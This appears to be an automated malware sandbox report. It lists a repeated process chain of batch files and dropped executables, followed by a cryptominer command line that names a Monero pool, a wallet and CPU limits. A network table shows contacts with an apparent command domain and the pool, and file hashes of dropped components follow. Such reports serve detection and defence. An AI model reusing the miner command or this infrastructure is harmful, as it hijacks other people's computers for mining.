cmd /c ""C:\Windows\TEMP\621e6a82.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\49ae094a.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 664 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\394c082a.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2272 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\10d34ed4.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 888 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\026b11b1.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1924 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\15f51c58.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3012 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\018c2b2c.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3056 -s 384

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\631b15eb.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2116 -s 384

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\54b358c8.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 384

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\6e3e1778.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2308 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\1bd91e52.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2584 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\7d680911.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 664 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\2b020feb.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2124 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\1c9a52c8.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 960 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\4a3559a2.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\7dd01485.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3064 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\27642b53.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 384

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\02f26209.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2232 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\748a24e6.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 264 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\121c53a2.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1720 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\03b4167f.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 396 -s 384

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\5b3b5d29.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3048 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\4ad95c09.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1528 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\6a654ec2.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2768 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\1e0009a5.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2400 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\378b4855.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\65264f2f.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2992 -s 384

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\0eb965fd.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1412 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\3c546cd7.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 968 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\23e40b9f.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 792 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\13820a7f.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2448 -s 384

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\7511753e.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 628 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\66a9381b.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2664 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\14443ef5.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2488 -s 384

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\7fdb4dc9.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2972 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\19660c79.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2224 -s 384

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\4d01475c.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1908 -s 380

C:\ProgramData\National\National.exe

C:\ProgramData\National\National.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\TEMP\aEHvt.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Windows\TEMP\009c023f.bat" "

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\ProgramData\Microsoft\National\Nationa.exe

C:\ProgramData\Microsoft\National\Nationa.exe -o stratum+tcp://xmr.crypto-pool.fr:80 -u 48ihXYmNKMUCdz7C5e5KB47FWxf9W6ruEYbhXHZ8qVff71WJ8TAZWCdM1rLUBpVWBdEzTYJbNt4URDm9M6mdbrvoToBSJA9 -p x -k --max-cpu-usage=80

Network

Country Destination Domain Proto
US 8.8.8.8:53 ddos.dnsnb8.net udp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 44.221.84.105:799 ddos.dnsnb8.net tcp
US 8.8.8.8:53 xmr.crypto-pool.fr udp

Files

memory/2932-1-0x0000000001330000-0x0000000001455000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\aEHvt.exe

MD5 56b2c3810dba2e939a8bb9fa36d3cf96
SHA1 99ee31cd4b0d6a4b62779da36e0eeecdd80589fc
SHA256 4354970ccc7cd6bb16318f132c34f6a1b3d5c2ea7ff53e1c9271905527f2db07
SHA512 27812a9a034d7bd2ca73b337ae9e0b6dc79c38cfd1a2c6ac9d125d3cc8fa563c401a40d22155811d5054e5baa8cf8c8e7e03925f25fa856a9ba9dea708d15b4e

memory/2400-11-0x0000000000F50000-0x0000000000F59000-memory.dmp

memory/2932-10-0x0000000000F50000-0x0000000000F59000-memory.dmp

memory/2932-9-0x0000000000F50000-0x0000000000F59000-memory.dmp

C:\ProgramData\National\National.exe

MD5 5646516f9069627c54a3878c3af85286
SHA1 ae5b07a58f1e1d148d76b4241dfedddab6def8cc
SHA256 ff4e9b01d2553acf16d757f2877f29710872de0c468d3eccded2a00decb7b8d9
SHA512 d0942c255d0f0b525d83c2ac903f0f078667bfb71bd6524d1859892598e11c1ed673e694bf07e4bbcae31e1910f30be4d15213e67005fb36e5a9fcf92a6a36cf

memory/2876-16-0x0000000000C60000-0x0000000000D85000-memory.dmp

memory/2584-28-0x0000000000310000-0x0000000000319000-memory.dmp

memory/2876-27-0x0000000000310000-0x0000000000319000-memory.dmp

memory/2876-25-0x0000000000310000-0x0000000000319000-memory.dmp

C:\Program Files\7-Zip\Uninstall.exe

MD5 1ed5616ed60110cedcb60672a3983a8a
SHA1 d23249b50ca54992b9cd3a29248a6afd7d68f7c4
SHA256 d5ccebde4c2f10937e2f991f27f0c7c917179c07ce9037ccfc0dbfc5dfa5e9ee
SHA512 284413b448f2958f76264c432f042a1cc8b6ca080710f97430279a6f03256409412ee27da509123aae1dc507bd9a43c123ef2cbee6dbf190109dc5af958dbbcb

memory/2932-30-0x0000000001330000-0x0000000001455000-memory.dmp

memory/2876-36-0x0000000000C60000-0x0000000000D85000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TTL9DZJ3\k1[1].rar

MD5 d3b07384d113edec49eaa6238ad5ff00
SHA1 f1d2d2f924e986ac86fdf7b36c94bcdf32beec15
SHA256 b5bb9d8014a0f9b1d61e21e796d78dccdf1352f23cd32812f4850b878ae4944c
SHA512 0cf9180a764aba863a67b6d72f0918bc131c6772642cb2dce5a34f0a702f9470ddc2bf125c12198b1995c233c34b4afd346c54a2334c350a948a51b6e8b4e6b6

C:\Users\Admin\AppData\Local\Temp\7D1C7CCD.exe

MD5 20879c987e2f9a916e578386d499f629
SHA1 c7b33ddcc42361fdb847036fc07e880b81935d5d
SHA256 9f2981a7cc4d40a2a409dc895de64253acd819d7c0011c8e80b86fe899464e31
SHA512 bcdde1625364dd6dd143b45bdcec8d59cf8982aff33790d390b839f3869e0e815684568b14b555a596d616252aeeaa98dac2e6e551c9095ea11a575ff25ff84f

C:\Users\Admin\AppData\Local\Temp\069f635f.bat

MD5 f76216c91b72e2d1e8c0cb1d8c2322a9
SHA1 b3770a7c38a213bd3f2f557e9381143065b89579
SHA256 436a663dfb50c94a113b4b14fbac0dee6e81187ddddcb10232ed8cd5dc25742c
SHA512 764cb883a0ba9a7a5efdf4b94dc6af2ffb7a283c8c6a3f33d919472e4b6a0f1a4297c692a60e86aca7c27ac6baa0d08b9a37e9a89d824150fd1d4323da60262f

memory/2400-82-0x0000000000F50000-0x0000000000F59000-memory.dmp

C:\Windows\Temp\2a5e5aa5.bat

MD5 0681df98734cc7662e50f7fe16030642
SHA1 1e5e60c0589e1c0e170c536c2bcd8a93d0367f64
SHA256 cdb9ae922a35968a732169262432038cb7106e82f9aa7dc6a7b942818a578d28
SHA512 d48720cc5f8359b3b2695dd5b4d9172d0e3aac0a6f86d7bf1477aaedf0c7801abab9b6305af7b2ecc1eb78608852c5ff794cad6910c3f24d943fe8f3dfef9846

memory/2584-99-0x0000000000310000-0x0000000000319000-memory.dmp

memory/1908-102-0x0000000000240000-0x0000000000365000-memory.dmp

memory/1908-105-0x0000000000080000-0x0000000000089000-memory.dmp

memory/264-114-0x0000000000D60000-0x0000000000D69000-memory.dmp

memory/1908-113-0x0000000000080000-0x0000000000089000-memory.dmp

C:\Windows\Temp\49f92fd0.bat

MD5 ac06488eaf99518e14bf141781e22431
SHA1 16de4c887a6e8a9494b6a8475222601b641dcf57
SHA256 433c3c5915908a7c70c2b372dd190701d4dcbfe3d098f377c7336a6980926f79
SHA512 d0d76d2812d3a784b46d56f83a458446ede87ded4f604c95aba72fb3e7ca48d890e024ef274a0ed29e4e918bdd71baa6c1ae25e9895d85d379cd4ec974399de0

memory/1908-128-0x0000000000240000-0x0000000000365000-memory.dmp

memory/2984-130-0x0000000001270000-0x0000000001395000-memory.dmp

memory/2984-134-0x0000000000130000-0x0000000000139000-memory.dmp

memory/2432-141-0x0000000001290000-0x0000000001299000-memory.dmp

memory/2984-140-0x0000000000130000-0x0000000000139000-memory.dmp

C:\Windows\Temp\3b645e2c.bat

MD5 7669153151fffa9fb828803320449601
SHA1 cff6301e23dca23ea5baf2ce487cf0c402d5709d
SHA256 01160233e5d9f04545e10622d657db552a5632af0550478e4266f85baa4459fd
SHA512 c1424f47dcbcbe368668729192a625a2bc29480e04a57105f77e618cd01409e1796f3b36228e604fead32787b955461130879b753e315a16a5e7077fe8748cd7

memory/2432-150-0x0000000001290000-0x0000000001299000-memory.dmp

memory/2984-156-0x0000000001270000-0x0000000001395000-memory.dmp

memory/1544-161-0x0000000000B90000-0x0000000000B99000-memory.dmp

memory/324-167-0x0000000000B90000-0x0000000000B99000-memory.dmp

C:\Windows\Temp\1cc7346a.bat

MD5 4fe70e954366c7fbfa01bfda4d507540
SHA1 8f1cbf97a0fe1f25f6ed58a3a597ecbbbf457353
SHA256 82f38e97ff630292579cfb332cc92d626b451dfbc5764e4f92bb3086276ee4af
SHA512 dd49b50730d28a08bd31e27068eb77d3dbd5f57454a936813e8feac78877703d2313b0af6e6775a9a8c32b6c38d37d062c3a9b3791b1d5683b19c97de0e346d1

memory/324-177-0x0000000000B90000-0x0000000000B99000-memory.dmp

memory/1544-183-0x0000000001270000-0x0000000001395000-memory.dmp

memory/2372-195-0x0000000000CA0000-0x0000000000CA9000-memory.dmp

memory/628-194-0x0000000000CA0000-0x0000000000CA9000-memory.dmp

memory/628-193-0x0000000000CA0000-0x0000000000CA9000-memory.dmp

C:\Windows\Temp\26491afc.bat

MD5 6041f9e6dfbe41cda3a62e9e8cf513e0
SHA1 f67350784486a682e101c09763757fa2a9c20c9d
SHA256 ca92d9aa9af516c4bc3fbc10b4345830a34d9b1d8f81e0457aca6dc4499a7b9d
SHA512 0e5c0eeb4614ccc6112218f93e1d111ed88e1998f3200d4670e9409632a058b24f204f540a9f5352d09f348fbc04751e028809bce46c90e614a9b347c0d6af28

memory/2372-205-0x0000000000CA0000-0x0000000000CA9000-memory.dmp

memory/628-211-0x0000000001270000-0x0000000001395000-memory.dmp

memory/2868-216-0x00000000011E0000-0x00000000011E9000-memory.dmp

memory/2864-222-0x00000000011E0000-0x00000000011E9000-memory.dmp

C:\Windows\Temp\59b8415e.bat

MD5 e4e3b8f825f57cd9f7c436ba7f5047ed
SHA1 17d9592bd49b9f1f483abfe1fef55fdd375f1a6c
SHA256 8de20423b7b3286956e3109256d988968c5b5ca68d8e43e2f165e9c43a0f8c0b
SHA512 f723d31a62ff4689d82928a23d8ba93661da12647734d732873d9f2d8e0794f46bf9d4aea3afaebf0b023ab9d96844324310e790dc359554f97df7f7db69d26a

memory/2864-232-0x00000000011E0000-0x00000000011E9000-memory.dmp

memory/2868-238-0x0000000001270000-0x0000000001395000-memory.dmp

memory/2128-243-0x0000000000C70000-0x0000000000C79000-memory.dmp

memory/2208-249-0x0000000000C70000-0x0000000000C79000-memory.dmp

memory/2128-248-0x0000000000C70000-0x0000000000C79000-memory.dmp

C:\Windows\Temp\21372fea.bat

MD5 67acfa8bc3dab6dd47c93258e57e77ed
SHA1 db8da5e868d27032cd4f2ec9c109433725cbbc17
SHA256 a6a02cc1855f55fc94e842229645696b7a74ef7aabf455e4d74cd7c47adc0e7e
SHA512 4cc720a5df850ec257628f100831fbb04708fa4bd7287767519350ddc272c05d343440d1bfcbeddd32ec039326d63f238469a0cc60bc4e5eac7af26677c8ccf9

memory/2208-259-0x0000000000C70000-0x0000000000C79000-memory.dmp

memory/2128-260-0x0000000001270000-0x0000000001395000-memory.dmp

memory/276-263-0x0000000000EB0000-0x0000000000EB9000-memory.dmp

memory/1656-267-0x0000000000EB0000-0x0000000000EB9000-memory.dmp

C:\Windows\Temp\30b94a85.bat

MD5 a62a04281f330b22d162906dcdd38b19
SHA1 9368100c708f60ad7f7adb59607eaef16936e8d0
SHA256 0b701637410f5fb338047d8599e57bc1e87b1af1b3ed44715a269b4e2752984e
SHA512 47a79d860e5a96cb40c3eff6739e941fc7dc654e8e25ff3658c614215b47f924913501b0c6428e01b1dad1144dbb24e11b14b25f94c41718a793a91295cfd03d

memory/1656-277-0x0000000000EB0000-0x0000000000EB9000-memory.dmp

memory/276-278-0x0000000001270000-0x0000000001395000-memory.dmp

memory/2772-287-0x0000000000990000-0x0000000000999000-memory.dmp

memory/2512-286-0x0000000000990000-0x0000000000999000-memory.dmp

memory/2772-285-0x0000000000990000-0x0000000000999000-memory.dmp

memory/2772-284-0x0000000001270000-0x0000000001395000-memory.dmp

memory/2512-297-0x0000000000990000-0x0000000000999000-memory.dmp

C:\Windows\Temp\50453d3e.bat

MD5 2693a0eafe676539d01f91f07f09015a
SHA1 58dd3afe81f41884f76b27b30d61a48009b95007
SHA256 67200b21b0bc2c54e107c73ffafd750c9fbadb7a3ad95f51a25e1a7c83975ca3
SHA512 334c0d493c7886f783f4276828f0426870f09b6178ce422b7ca43eb30faf484e684c56df4785d70f3cbecd3b9b8c40d49d336e5c1a12a95048c810e805adb29e

memory/2772-298-0x0000000001270000-0x0000000001395000-memory.dmp

memory/1844-300-0x0000000001270000-0x0000000001395000-memory.dmp

memory/1844-302-0x00000000000F0000-0x00000000000F9000-memory.dmp

memory/2224-306-0x00000000001A0000-0x00000000001A9000-memory.dmp

memory/2224-316-0x00000000001A0000-0x00000000001A9000-memory.dmp

C:\Windows\Temp\55c033c4.bat

MD5 35da85bbbacce078b53e3013fc97482d
SHA1 ab2c50fa09d79443480001af8ed75e8bb85017d0
SHA256 70eda237b91f161237c1366701341a4a1293bf3a7143b74161984481d5721263
SHA512 8b58a3c914f2a7277c789b9a95005921223508d0999364e0e9eb4f60099c8092a51122131c4ddbb8bd08fc3a5a088c13be738e025b51d34996d096a8d7d0e362

memory/1844-317-0x0000000001270000-0x0000000001395000-memory.dmp

memory/1788-323-0x0000000000FB0000-0x0000000000FB9000-memory.dmp

memory/1788-324-0x0000000000FB0000-0x0000000000FB9000-memory.dmp

memory/1720-325-0x0000000000FB0000-0x0000000000FB9000-memory.dmp

C:\Windows\Temp\6f4b7274.bat

MD5 550dc4303d01c4b4b4b1ded468764d1e
SHA1 7b71b860d63eedc0a109325e2a0602dab41b84bc
SHA256 36e23609eff7c1a1bde8c6ab35c79d45e0cca49919b7f0a6270d692f48dfe19f
SHA512 e6ca6b2e32267122af3e690ce99c5df7a60a38bc32ae92527e30c65c8dcbc2c8a09d935dbda55d974dc2b8a6433bcc7b6598655df6da9a0c40ffdde98b7ce5e8

memory/1720-335-0x0000000000FB0000-0x0000000000FB9000-memory.dmp

memory/1788-336-0x0000000001270000-0x0000000001395000-memory.dmp

memory/960-337-0x00000000001E0000-0x0000000000305000-memory.dmp

memory/960-340-0x00000000000F0000-0x00000000000F9000-memory.dmp

memory/1476-344-0x00000000013B0000-0x00000000013B9000-memory.dmp

C:\Windows\Temp\7ece0d0f.bat

MD5 a676ae49995a6b0d375d910a12302865
SHA1 6af9568060104ac6d518e7b14b71b2cd946948a3
SHA256 13398af1697be873b14261c58d5fa435346cff2ebec702631c68b4eb6c0c7795
SHA512 a2c73f30b63895c7292e6e8dfdf7d60eb06cef36c0f4d74528787f050c15970868d4e2c780b03ee18e4e1a2b68957872f82ace9259da7119e54f39708964ebb6

memory/1476-354-0x00000000013B0000-0x00000000013B9000-memory.dmp

memory/960-355-0x00000000001E0000-0x0000000000305000-memory.dmp

memory/2368-357-0x0000000000340000-0x0000000000465000-memory.dmp

memory/2368-359-0x0000000000130000-0x0000000000139000-memory.dmp

memory/624-364-0x0000000000D30000-0x0000000000D39000-memory.dmp

memory/2368-363-0x0000000000130000-0x0000000000139000-memory.dmp

C:\Windows\Temp\605d77ce.bat

MD5 ac60ec8589e7b5eecde2580f1ec254a4
SHA1 bb2930145f608840053290dbe19237b984553531
SHA256 0f4caebd9f2ed6f592e124158a0eb2d42400c097616304d3e1233c84ea4c84a2
SHA512 a4aaffe8aa610e188f9a3c5d0fb645cb30d1c648ac0c65078d6849614a1f3a2719d6418a6cd88c3e753a054b067876dd61942b228b0ba4c20421dc7107d97cc3

memory/624-374-0x0000000000D30000-0x0000000000D39000-memory.dmp

memory/2368-375-0x0000000000340000-0x0000000000465000-memory.dmp

memory/1724-376-0x00000000012F0000-0x0000000001415000-memory.dmp

memory/1932-384-0x00000000008B0000-0x00000000008B9000-memory.dmp

memory/1724-383-0x00000000000F0000-0x00000000000F9000-memory.dmp

memory/1724-382-0x00000000000F0000-0x00000000000F9000-memory.dmp

C:\Windows\Temp\69df5e60.bat

MD5 9deace4a0d55f9d627047ab318b5afaa
SHA1 a5cde9c22cc92393551ec055049de3f8bcfde481
SHA256 2198189fe0c7907156554fb1574b6672c1b1348a1069f406617bd43e6fbc9186
SHA512 18a1b9188fb572d86eb7202d33966b0d8b48e0f309f202b9792c8fe14bd7cee274757d237d94bfdd94998cdb25a36beeb05c33982365e54aaa2c43f2069ac9aa

memory/1932-394-0x00000000008B0000-0x00000000008B9000-memory.dmp

memory/1724-395-0x00000000012F0000-0x0000000001415000-memory.dmp

memory/2744-399-0x00000000000F0000-0x00000000000F9000-memory.dmp

memory/2744-398-0x00000000012F0000-0x0000000001415000-memory.dmp

memory/2820-403-0x00000000003D0000-0x00000000003D9000-memory.dmp

C:\Windows\Temp\516f7d28.bat

MD5 3f9f67bd96fe63cf422afc90a5e91e00
SHA1 93acafd09aa01b8c1b1fb664b1ef7acd5b3166aa
SHA256 36645dd2ee9d2f39c67e0285b0800afa505ebfdae6bd1939f3832fd642b96333
SHA512 fd8fa002a5a36e3b8a3112e97a760269cd5d323ef34daf88250f53dc818048ea3762b6388ca0e8ee7d09e5628197495c96cad06127c6d35c62e7db262b5fd51e

memory/2820-413-0x00000000003D0000-0x00000000003D9000-memory.dmp

memory/2744-414-0x00000000012F0000-0x0000000001415000-memory.dmp

memory/900-417-0x0000000000FD0000-0x0000000000FD9000-memory.dmp

memory/108-421-0x0000000000FD0000-0x0000000000FD9000-memory.dmp

C:\Windows\Temp\22f60fc9.bat

MD5 eba7ed31403ffcebd1056d4d844c29b5
SHA1 8817458f2290fb9500a3fe8f78da035affa71183
